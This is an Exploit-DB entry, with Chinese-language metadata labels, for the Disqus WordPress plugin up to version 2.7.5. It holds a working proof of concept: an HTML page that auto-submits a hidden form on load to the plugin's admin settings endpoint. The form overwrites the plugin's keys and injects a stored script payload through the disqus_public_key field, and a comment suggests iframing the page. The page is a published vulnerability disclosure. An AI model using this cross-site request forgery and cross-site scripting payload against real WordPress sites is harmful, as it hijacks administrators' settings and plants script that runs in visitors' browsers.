WordPress Plugin Disqus 2.7.5 – Cross-Site Request Forgery (Admin Persistent) / Cross-Site Scripting

  • 作者: Nik Cubrilovic
    日期: 2014-08-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34336/
  • <!--
    Exploit for Disqus for WordPress admin stored CSRF+XSS up to v2.7.5
    
    Blog post explainer: https://www.nikcub.com/posts/multiple-vulnerabilities-in-disqus-wordpress-plugin/
    
    12th August 2014
    
    Nik Cubrilovic - www.nikcub.com
    
    Most of these params are unfiltered/injectable. Not framable on newer WordPress.
    
    -->
    
    <body onload="javascript:document.forms[0].submit()">
    
    
    <formaction="http://wordpress.dev/wp-admin/edit-comments.php?page=disqus" method="post" class="dashboard-widget-control-form">
    <h1>disqus csrf reset</h1>
    <!-- Idea for you: Iframe it -->
    <input name="disqus_forum_url" type="hidden" value="wordpress342222222" />
    <input name="disqus_replace" type="hidden" value="all" />
    
    <!-- <input name="disqus_partner_key" type="hidden" value="1" /> -->
    <input name="disqus_cc_fix" type="hidden" value="1" />
    <input name="disqus_partner_key" type="hidden" value="1" />
    <input name="disqus_secret_key" type="hidden" value="1" />
    <!-- Your File: <input name="disqus_sso_button" type="file" /><br /> -->
    <input type="submit" value="save" />
    <input name="disqus_public_key" type="hidden" value='&lt;/textarea&gt;<script>alert(1);</script><textarea>' />
    </form>